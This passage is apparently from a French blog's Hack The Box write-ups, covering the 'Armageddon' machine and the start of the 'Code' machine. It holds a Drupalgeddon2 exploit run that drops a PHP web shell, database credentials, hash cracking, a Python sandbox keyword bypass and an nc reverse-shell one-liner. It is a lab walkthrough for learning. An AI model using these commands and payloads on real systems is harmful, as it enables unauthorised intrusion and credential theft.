text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Armageddon</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.79</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">drupaluser : CQHEy@9M*m23gBVj </span></span><span class="line"><span class="cl">brucetherealadmin </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Armageddon<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.233 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.4 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC2xdFP3J4cpINVArODYtbhv+uQNECQHDkzTeWL+4aLgKcJuIoA8dQdVuP2UaLUJ0XtbyuabPEBzJl3IHg3vztFZ8UEcS94KuWP09ghv6fhc7JbFYONVJTYLiEPD8nrS/V2EPEQJ2ubNXcZAR76X9SZqt11JTyQH/s6tPH+m3m/84NUU8PNb/dyhrFpCUmZzzJQ1zCDStLXJnCAOE7EfW2wNm1CBPCXn1wNvO3SKwokCm4GoMKHSM9rNb9FjGLIY0nq+8mt7RTJZ+WLdHsje3AkBk1yooGFF+0TdOj42YK2OtAKDQBWnBm1nqLQsmm/Va9T2bPYLLK5aUd4/578u7h </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE4kP4gQ5Th3eu3vz/kPWwlUCm+6BSM6M3Y43IuYVo3ppmJG+wKiabo/gVYLOwzG7js497Vr7eGIgsjUtbIGUrY<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG9ZlC3EA13xZbzvvdjZRWhnu9clFOUe7irG8kT0oR4A </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.6 <span class="o">((</span>CentOS<span class="o">)</span> PHP/5.4.16<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">36</span> disallowed entries </span></span><span class="line"><span class="cl"><span class="p">|</span> /includes/ /misc/ /modules/ /profiles/ /scripts/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php </span></span><span class="line"><span class="cl"><span class="p">|</span> /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /user/register/ /user/password/ /user/login/ /user/logout/ /?q<span class="o">=</span>admin/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /?q<span class="o">=</span>comment/reply/ /?q<span class="o">=</span>filter/tips/ /?q<span class="o">=</span>node/add/ /?q<span class="o">=</span>search/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_/?q<span class="o">=</span>user/password/ /?q<span class="o">=</span>user/register/ /?q<span class="o">=</span>user/login/ /?q<span class="o">=</span>user/logout/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Welcome to Armageddon <span class="p">|</span> Armageddon </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: Drupal <span class="m">7</span> <span class="o">(</span>http://drupal.org<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.6 <span class="o">(</span>CentOS<span class="o">)</span> PHP/5.4.16 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="drupal-756">Drupal 7.56 </h3><p>On remarque dans le code source la version du framework utilisé : Drupal 7.</p> <p>On trouve le dossier: http://10.10.10.233/scripts/ Les scripts datent du 21 juin 2017.</p> <p>En regardant les releases de Drupal sur github, on découvre que la version Drupal 7.56 est sortie précisement à cette date : <a class="link" href="https://github.com/drupal/drupal/releases/tag/7.56" target="_blank" rel="noopener" >https://github.com/drupal/drupal/releases/tag/7.56</a></p> <p>Avec searchsploit, on trouve une RCE (sans authentification préalable) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Armageddon<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ searchsploit drupal 7.56 </span></span><span class="line"><span class="cl">--------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">--------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution <span class="p">|</span> php/webapps/44449.rb </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Output:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Armageddon<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ruby drupalggedon2.rb http://10.10.10.233 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> --<span class="o">==[</span>::#Drupalggedon2::<span class="o">]==</span>-- </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Target : http://10.10.10.233/ </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found : http://10.10.10.233/CHANGELOG.txt <span class="o">(</span>HTTP Response: 200<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Drupal!: v7.56 </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Form <span class="o">(</span>user/password<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Form valid </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Clean URLs </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Result : Clean URLs disabled <span class="o">(</span>HTTP Response: 404<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Isn<span class="s1">&#39;t an issue for Drupal v7.x </span></span></span><span class="line"><span class="cl"><span class="s1">-------------------------------------------------------------------------------- </span></span></span><span class="line"><span class="cl"><span class="s1">[*] Testing: Code Execution (Method: name) </span></span></span><span class="line"><span class="cl"><span class="s1">[i] Payload: echo YAQXUKKI </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Result : YAQXUKKI </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! </span></span></span><span class="line"><span class="cl"><span class="s1">-------------------------------------------------------------------------------- </span></span></span><span class="line"><span class="cl"><span class="s1">[*] Testing: Existing file (http://10.10.10.233/shell.php) </span></span></span><span class="line"><span class="cl"><span class="s1">[!] Response: HTTP 200 // Size: 6. ***Something could already be there?*** </span></span></span><span class="line"><span class="cl"><span class="s1">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span></span><span class="line"><span class="cl"><span class="s1">[*] Testing: Writing To Web Root (./) </span></span></span><span class="line"><span class="cl"><span class="s1">[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Result : &lt;?php if( isset( $_REQUEST[&#39;</span>c<span class="s1">&#39;] ) ) { system( $_REQUEST[&#39;</span>c<span class="s1">&#39;] . &#39;</span> 2&gt;<span class="p">&amp;</span>1<span class="s1">&#39; ); } </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!! </span></span></span><span class="line"><span class="cl"><span class="s1">-------------------------------------------------------------------------------- </span></span></span><span class="line"><span class="cl"><span class="s1">[i] Fake PHP shell: curl &#39;</span>http://10.10.10.233/shell.php<span class="s1">&#39; -d &#39;</span><span class="nv">c</span><span class="o">=</span>hostname<span class="err">&#39;</span> </span></span><span class="line"><span class="cl">armageddon.htb&gt;&gt; whoami </span></span><span class="line"><span class="cl">apache </span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql-database">Mysql Database </h3><p>On trouve dans un fichier settings.php les creds pour la base de donnée mysql de Drupal.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">$databases</span> <span class="o">=</span> array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;default&#39;</span> <span class="o">=</span>&gt; </span></span><span class="line"><span class="cl"> array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;default&#39;</span> <span class="o">=</span>&gt; </span></span><span class="line"><span class="cl"> array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;database&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;drupal&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;username&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;drupaluser&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;password&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;CQHEy@9M*m23gBVj&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;host&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;localhost&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;port&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;driver&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;mysql&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;prefix&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="o">)</span>, </span></span><span class="line"><span class="cl"><span class="o">)</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-hashes-from-bruce-and-admin">Getting hashes from bruce and admin </h3><p>Toujours depuis le shell obtenu avec l&rsquo;exploit (pas interfactif ! Mais assez stable). On récupère le hachage de bruce et admin :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">armageddon.htb&gt;&gt; mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e <span class="s2">&#34;SELECT * FROM users&#34;</span> </span></span><span class="line"><span class="cl">uid name pass mail theme signature signature_format created access login status timezone language picture init data </span></span><span class="line"><span class="cl"><span class="m">0</span> NULL <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> <span class="m">0</span> NULL <span class="m">0</span> NULL </span></span><span class="line"><span class="cl"><span class="m">1</span> brucetherealadmin <span class="nv">$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97</span>.oOsUf1xAhaadURt admin@armageddon.eu filtered_html <span class="m">1606998756</span> <span class="m">1607077194</span> <span class="m">1607076276</span> <span class="m">1</span> Europe/London <span class="m">0</span> admin@armageddon.eu a:1:<span class="o">{</span>s:7:<span class="s2">&#34;overlay&#34;</span><span class="p">;</span>i:1<span class="p">;</span><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="cracking-hashes-of-bruce-usertxt">Cracking hashes of bruce (user.txt) </h3><p>On le crack avec hashcat :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat ./hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">Hash-mode was not specified with -m. Attempting to auto-detect <span class="nb">hash</span> mode. </span></span><span class="line"><span class="cl">The following mode was auto-detected as the only one matching your input hash: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">7900</span> <span class="p">|</span> Drupal7 <span class="p">|</span> Forums, CMS, E-Commerce </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed! </span></span><span class="line"><span class="cl">Do NOT report auto-detect issues unless you are certain of the <span class="nb">hash</span> type. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97</span>.oOsUf1xAhaadURt:booboo </span></span></code></pre></td></tr></table> </div> </div><p>On se connecte en ssh à l&rsquo;utilisateur brucetherealadmin :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Armageddon<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh brucetherealadmin@10.10.10.233 </span></span><span class="line"><span class="cl">brucetherealadmin@10.10.10.233<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Last failed login: Thu Apr <span class="m">3</span> 22:28:06 BST <span class="m">2025</span> from 10.10.14.17 on ssh:notty </span></span><span class="line"><span class="cl">There were <span class="m">3</span> failed login attempts since the last successful login. </span></span><span class="line"><span class="cl">Last login: Fri Mar <span class="m">19</span> 08:01:19 <span class="m">2021</span> from 10.10.14.5 </span></span><span class="line"><span class="cl"><span class="o">[</span>brucetherealadmin@armageddon ~<span class="o">]</span>$ </span></span><span class="line"><span class="cl"><span class="o">[</span>brucetherealadmin@armageddon ~<span class="o">]</span>$ whoami </span></span><span class="line"><span class="cl">brucetherealadmin </span></span><span class="line"><span class="cl"><span class="o">[</span>brucetherealadmin@armageddon ~<span class="o">]</span>$ cat user.txt </span></span><span class="line"><span class="cl">f0f8.....bbcc </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="snap-install-as-root">snap install as root </h3><p>Il faut faire sudo -l. On observe qu&rsquo;on peut executer &ldquo;snap install&rdquo; en tant que root. C&rsquo;est à dire que l&rsquo;on peut installer n&rsquo;importe quel package snap en tant que root. Or, j&rsquo;ai pu créer un packet vérolé qui s&rsquo;installe et s&rsquo;execute lors de l&rsquo;installation, permettant l&rsquo;ouverture d&rsquo;un shell en tant que root.</p>https://leopoldabgn.github.io/writeups/p/code-htb/Wed, 26 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/code-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Code cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Code</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.62</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">martin:nafeelswordsmaster </span></span><span class="line"><span class="cl">development:development </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.62 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCrE0z9yLzAZQKDE2qvJju5kq0jbbwNh6GfBrBu20em8SE/I4jT4FGig2hz6FHEYryAFBNCwJ0bYHr3hH9IQ7ZZNcpfYgQhi8C+QLGg+j7U4kw4rh3Z9wbQdm9tsFrUtbU92CuyZKpFsisrtc9e7271kyJElcycTWntcOk38otajZhHnLPZfqH90PM+ISA93hRpyGyrxj8phjTGlKC1O0zwvFDn8dqeaUreN7poWNIYxhJ0ppfFiCQf3rqxPS1fJ0YvKcUeNr2fb49H6Fba7FchR8OYlinjJLs1dFrx0jNNW/m3XS3l2+QTULGxM5cDrKip2XQxKfeTj4qKBCaFZUzknm27vHDW3gzct5W0lErXbnDWQcQZKjKTPu4Z/uExpJkk1rDfr3JXoMHaT4zaOV9l3s3KfrRSjOrXMJIrImtQN1l08nzh/Xg7KqnS1N46PEJ4ivVxEGFGaWrtC1MgjMZ6FtUSs/8RNDn59Pxt0HsSr6rgYkZC2LNwrgtMyiiwyas<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiXZTkrXQPMXdU8ZTTQI45kkF2N38hyDVed+2fgp6nB3sR/mu/7K4yDqKQSDuvxiGe08r1b1STa/LZUjnFCfgg<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8Cwf2cBH9EDSARPML82QqjkV811d+Hsjrly11/PHfu </span></span><span class="line"><span class="cl">5000/tcp open http syn-ack Gunicorn 20.0.4 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Python Code Editor </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: gunicorn/20.0.4 </span></span><span class="line"><span class="cl">Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="python-sandbox-port-5000">Python sandbox (port 5000) </h3><p>Sur le port 5000, on trouve une sandbox, permettant d&rsquo;executer du code <strong>Python</strong>. Cependant, après quelques tests on remarque que certains mot-clés sont interdits, empêchant l&rsquo;execution de certaines commandes.</p> <h3 id="restricted-keywords">Restricted keywords </h3><p>J&rsquo;ai fait une liste au fur et a mesure des keywords non acceptés</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Restricted keywords</span> </span></span><span class="line"><span class="cl">import </span></span><span class="line"><span class="cl">os </span></span><span class="line"><span class="cl"><span class="nb">read</span> </span></span><span class="line"><span class="cl">popen </span></span><span class="line"><span class="cl">open </span></span><span class="line"><span class="cl">__builtins__ </span></span></code></pre></td></tr></table> </div> </div><h3 id="app-production-reverse-shell">app-production reverse shell </h3><p>J&rsquo;ai finalement réussi à bypasser la restriction en trouvant les mots clés permettant une execution de code à distance :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## On bypass la restriction sur le mot clé &#34;os&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">lib</span> <span class="o">=</span> globals<span class="o">()[</span><span class="s2">&#34;o&#34;</span>+<span class="s2">&#34;s&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## on bypass la restriction sur le mot clé &#34;system&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">cmd</span> <span class="o">=</span> <span class="s2">&#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc 10.10.14.4 1337 &gt;/tmp/f&#34;</span> </span></span><span class="line"><span class="cl">getattr<span class="o">(</span>lib, <span class="s2">&#34;syst&#34;</span> + <span class="s2">&#34;em&#34;</span><span class="o">)(</span>cmd<span class="o">)</span> <span class="c1"># Exécuter la commande</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Affiche la liste des dossiers</span> </span></span><span class="line"><span class="cl">print<span class="o">(</span>lib.listdir<span class="o">(</span><span class="s2">&#34;/home/app-production&#34;</span><span class="o">))</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td 